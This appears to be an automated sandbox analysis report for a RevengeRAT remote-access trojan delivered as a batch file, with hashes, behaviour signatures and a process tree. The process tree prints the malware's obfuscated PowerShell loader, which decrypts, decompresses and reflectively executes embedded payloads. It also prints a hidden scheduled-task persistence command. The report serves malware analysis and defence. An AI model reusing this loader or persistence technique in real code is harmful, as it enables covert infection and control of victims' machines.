Analysis
-
max time kernel
58s -
max time network
11s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
11/06/2024, 05:19
Static task
static1
Behavioral task
behavioral1
Sample
Client.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Client.bat
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Client.bat
Resource
win10v2004-20240426-en
Behavioral task
behavioral4
Sample
Client.bat
Resource
win11-20240426-en
General
-
Target
Client.bat
-
Size
265KB
-
MD5
01e96014af705a61d5ca83d367517549
-
SHA1
403b1418e8ff1b7bb218cf87bfb7cc45905ea3e1
-
SHA256
0259988df01a82ad5936bc17d01a96b07b8bd530790bf47277535edef3100ffc
-
SHA512
af19bf403f1204bef43d12b9c6872a0e67da2f8a6d168dd14481968c5d418fa982a3aa8677f7b011f39314ef6a351e785af3d46e692443cc23ea1fa3b2cbb7d2
-
SSDEEP
6144:c5G5RlzeUqntbabTty2g13glFyDZdCq0PfxGY:c5G5RUUguTE31QqddT0PZGY
Malware Config
Extracted
revengerat
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
RevengeRat Executable 1 IoCs
resource yara_rule behavioral4/memory/1716-86-0x0000018ECCDD0000-0x0000018ECCDD8000-memory.dmp revengerat -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1716 powershell.exe 5076 powershell.exe 1816 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 5076 powershell.exe 5076 powershell.exe 1816 powershell.exe 1816 powershell.exe 1716 powershell.exe 1716 powershell.exe 1716 powershell.exe 1716 powershell.exe 1716 powershell.exe 1716 powershell.exe 1716 powershell.exe 1716 powershell.exe 1716 powershell.exe 1716 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5076 powershell.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeIncreaseQuotaPrivilege 1816 powershell.exe Token: SeSecurityPrivilege 1816 powershell.exe Token: SeTakeOwnershipPrivilege 1816 powershell.exe Token: SeLoadDriverPrivilege 1816 powershell.exe Token: SeSystemProfilePrivilege 1816 powershell.exe Token: SeSystemtimePrivilege 1816 powershell.exe Token: SeProfSingleProcessPrivilege 1816 powershell.exe Token: SeIncBasePriorityPrivilege 1816 powershell.exe Token: SeCreatePagefilePrivilege 1816 powershell.exe Token: SeBackupPrivilege 1816 powershell.exe Token: SeRestorePrivilege 1816 powershell.exe Token: SeShutdownPrivilege 1816 powershell.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeSystemEnvironmentPrivilege 1816 powershell.exe Token: SeRemoteShutdownPrivilege 1816 powershell.exe Token: SeUndockPrivilege 1816 powershell.exe Token: SeManageVolumePrivilege 1816 powershell.exe Token: 33 1816 powershell.exe Token: 34 1816 powershell.exe Token: 35 1816 powershell.exe Token: 36 1816 powershell.exe Token: SeIncreaseQuotaPrivilege 1816 powershell.exe Token: SeSecurityPrivilege 1816 powershell.exe Token: SeTakeOwnershipPrivilege 1816 powershell.exe Token: SeLoadDriverPrivilege 1816 powershell.exe Token: SeSystemProfilePrivilege 1816 powershell.exe Token: SeSystemtimePrivilege 1816 powershell.exe Token: SeProfSingleProcessPrivilege 1816 powershell.exe Token: SeIncBasePriorityPrivilege 1816 powershell.exe Token: SeCreatePagefilePrivilege 1816 powershell.exe Token: SeBackupPrivilege 1816 powershell.exe Token: SeRestorePrivilege 1816 powershell.exe Token: SeShutdownPrivilege 1816 powershell.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeSystemEnvironmentPrivilege 1816 powershell.exe Token: SeRemoteShutdownPrivilege 1816 powershell.exe Token: SeUndockPrivilege 1816 powershell.exe Token: SeManageVolumePrivilege 1816 powershell.exe Token: 33 1816 powershell.exe Token: 34 1816 powershell.exe Token: 35 1816 powershell.exe Token: 36 1816 powershell.exe Token: SeIncreaseQuotaPrivilege 1816 powershell.exe Token: SeSecurityPrivilege 1816 powershell.exe Token: SeTakeOwnershipPrivilege 1816 powershell.exe Token: SeLoadDriverPrivilege 1816 powershell.exe Token: SeSystemProfilePrivilege 1816 powershell.exe Token: SeSystemtimePrivilege 1816 powershell.exe Token: SeProfSingleProcessPrivilege 1816 powershell.exe Token: SeIncBasePriorityPrivilege 1816 powershell.exe Token: SeCreatePagefilePrivilege 1816 powershell.exe Token: SeBackupPrivilege 1816 powershell.exe Token: SeRestorePrivilege 1816 powershell.exe Token: SeShutdownPrivilege 1816 powershell.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeSystemEnvironmentPrivilege 1816 powershell.exe Token: SeRemoteShutdownPrivilege 1816 powershell.exe Token: SeUndockPrivilege 1816 powershell.exe Token: SeManageVolumePrivilege 1816 powershell.exe Token: 33 1816 powershell.exe Token: 34 1816 powershell.exe Token: 35 1816 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1044 wrote to memory of 3272 1044 cmd.exe 78 PID 1044 wrote to memory of 3272 1044 cmd.exe 78 PID 3272 wrote to memory of 2864 3272 net.exe 79 PID 3272 wrote to memory of 2864 3272 net.exe 79 PID 1044 wrote to memory of 3512 1044 cmd.exe 80 PID 1044 wrote to memory of 3512 1044 cmd.exe 80 PID 1044 wrote to memory of 5076 1044 cmd.exe 81 PID 1044 wrote to memory of 5076 1044 cmd.exe 81 PID 5076 wrote to memory of 1816 5076 powershell.exe 82 PID 5076 wrote to memory of 1816 5076 powershell.exe 82 PID 5076 wrote to memory of 2876 5076 powershell.exe 85 PID 5076 wrote to memory of 2876 5076 powershell.exe 85 PID 2876 wrote to memory of 4512 2876 WScript.exe 86 PID 2876 wrote to memory of 4512 2876 WScript.exe 86 PID 4512 wrote to memory of 2272 4512 cmd.exe 88 PID 4512 wrote to memory of 2272 4512 cmd.exe 88 PID 2272 wrote to memory of 2700 2272 net.exe 89 PID 2272 wrote to memory of 2700 2272 net.exe 89 PID 4512 wrote to memory of 2340 4512 cmd.exe 90 PID 4512 wrote to memory of 2340 4512 cmd.exe 90 PID 4512 wrote to memory of 1716 4512 cmd.exe 91 PID 4512 wrote to memory of 1716 4512 cmd.exe 91 PID 1716 wrote to memory of 3312 1716 powershell.exe 53 PID 1716 wrote to memory of 1180 1716 powershell.exe 20 PID 1716 wrote to memory of 3040 1716 powershell.exe 50 PID 1716 wrote to memory of 1168 1716 powershell.exe 19 PID 1716 wrote to memory of 1552 1716 powershell.exe 26 PID 1716 wrote to memory of 1748 1716 powershell.exe 29 PID 1716 wrote to memory of 1548 1716 powershell.exe 27 PID 1716 wrote to memory of 1940 1716 powershell.exe 32 PID 1716 wrote to memory of 4300 1716 powershell.exe 67 PID 1716 wrote to memory of 1144 1716 powershell.exe 18 PID 1716 wrote to memory of 4492 1716 powershell.exe 71 PID 1716 wrote to memory of 2492 1716 powershell.exe 42 PID 1716 wrote to memory of 2516 1716 powershell.exe 43 PID 1716 wrote to memory of 2712 1716 powershell.exe 70 PID 1716 wrote to memory of 3492 1716 powershell.exe 55 PID 1716 wrote to memory of 928 1716 powershell.exe 11 PID 1716 wrote to memory of 1312 1716 powershell.exe 22 PID 1716 wrote to memory of 1704 1716 powershell.exe 28 PID 1716 wrote to memory of 712 1716 powershell.exe 15 PID 1716 wrote to memory of 2484 1716 powershell.exe 41 PID 1716 wrote to memory of 1884 1716 powershell.exe 31 PID 1716 wrote to memory of 800 1716 powershell.exe 8 PID 1716 wrote to memory of 4392 1716 powershell.exe 63 PID 1716 wrote to memory of 3444 1716 powershell.exe 54 PID 1716 wrote to memory of 4624 1716 powershell.exe 73 PID 1716 wrote to memory of 2648 1716 powershell.exe 48 PID 1716 wrote to memory of 2056 1716 powershell.exe 36 PID 1716 wrote to memory of 2252 1716 powershell.exe 39 PID 1716 wrote to memory of 1068 1716 powershell.exe 16 PID 1716 wrote to memory of 1656 1716 powershell.exe 69 PID 1716 wrote to memory of 2640 1716 powershell.exe 47 PID 1716 wrote to memory of 1452 1716 powershell.exe 25 PID 1716 wrote to memory of 1832 1716 powershell.exe 30 PID 1716 wrote to memory of 1244 1716 powershell.exe 21 PID 1716 wrote to memory of 1440 1716 powershell.exe 24 PID 1716 wrote to memory of 2620 1716 powershell.exe 46 PID 1716 wrote to memory of 452 1716 powershell.exe 14 PID 1716 wrote to memory of 2004 1716 powershell.exe 33 PID 1716 wrote to memory of 2200 1716 powershell.exe 38 PID 1716 wrote to memory of 1408 1716 powershell.exe 23 PID 1716 wrote to memory of 3964 1716 powershell.exe 60 PID 1716 wrote to memory of 4728 1716 powershell.exe 68
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵PID:800
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1180
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1440
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1552
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1548
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1832
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1884
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1940
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2004
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2016
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1976
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2200
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2252
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2580
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3040
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3312
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\system32\net.exenet file3⤵
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file4⤵PID:2864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('95fXsaIlcGmb66kIfwPk1Rgbc20oigIl2ZjrEVOMHi4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wjcEpBfUU+saUdwde7IiAQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dBbxa=New-Object System.IO.MemoryStream(,$param_var); $mlDCQ=New-Object System.IO.MemoryStream; $PXkUJ=New-Object System.IO.Compression.GZipStream($dBbxa, [IO.Compression.CompressionMode]::Decompress); $PXkUJ.CopyTo($mlDCQ); $PXkUJ.Dispose(); $dBbxa.Dispose(); $mlDCQ.Dispose(); $mlDCQ.ToArray();}function execute_function($param_var,$param2_var){ $VAZow=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $IkZgf=$VAZow.EntryPoint; $IkZgf.Invoke($null, $param2_var);}$EKyfL = 'C:\Users\Admin\AppData\Local\Temp\Client.bat';$host.UI.RawUI.WindowTitle = $EKyfL;$XGvbw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($EKyfL).Split([Environment]::NewLine);foreach ($ezjrc in $XGvbw) { if ($ezjrc.StartsWith('BPOZEQjVjBpbWIFJNOov')) { $rjbAO=$ezjrc.Substring(20); break; }}$payloads_var=[string[]]$rjbAO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:3512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_426_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_426.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_426.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_426.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\system32\net.exenet file6⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file7⤵PID:2700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('95fXsaIlcGmb66kIfwPk1Rgbc20oigIl2ZjrEVOMHi4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wjcEpBfUU+saUdwde7IiAQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dBbxa=New-Object System.IO.MemoryStream(,$param_var); $mlDCQ=New-Object System.IO.MemoryStream; $PXkUJ=New-Object System.IO.Compression.GZipStream($dBbxa, [IO.Compression.CompressionMode]::Decompress); $PXkUJ.CopyTo($mlDCQ); $PXkUJ.Dispose(); $dBbxa.Dispose(); $mlDCQ.Dispose(); $mlDCQ.ToArray();}function execute_function($param_var,$param2_var){ $VAZow=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $IkZgf=$VAZow.EntryPoint; $IkZgf.Invoke($null, $param2_var);}$EKyfL = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_426.bat';$host.UI.RawUI.WindowTitle = $EKyfL;$XGvbw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($EKyfL).Split([Environment]::NewLine);foreach ($ezjrc in $XGvbw) { if ($ezjrc.StartsWith('BPOZEQjVjBpbWIFJNOov')) { $rjbAO=$ezjrc.Substring(20); break; }}$payloads_var=[string[]]$rjbAO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:2340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1716
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4728
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4624
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD53ec0d76d886b2f4b9f1e3da7ce9e2cd7
SHA168a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea
SHA256214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5
SHA512a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
265KB
MD501e96014af705a61d5ca83d367517549
SHA1403b1418e8ff1b7bb218cf87bfb7cc45905ea3e1
SHA2560259988df01a82ad5936bc17d01a96b07b8bd530790bf47277535edef3100ffc
SHA512af19bf403f1204bef43d12b9c6872a0e67da2f8a6d168dd14481968c5d418fa982a3aa8677f7b011f39314ef6a351e785af3d46e692443cc23ea1fa3b2cbb7d2
-
Filesize
124B
MD5426e4d1ad59fc2df7be30e6f9344a8f9
SHA11b9370e43adabc31db76f75d88db23a7d741950a
SHA2560329aba0a29e9b3e291e1e96c3ee18e6dd7ac2a70d0579ba4aee2ca91e82ecf4
SHA51271d304e1cd41ec2078a071aa807e86db1fba4e55834f50279a0ed1c0978b7a9cd83edcd4ce85d47105d478db9f8fcd247ed8e516eb397b0a72b7dfe5c03c8d8f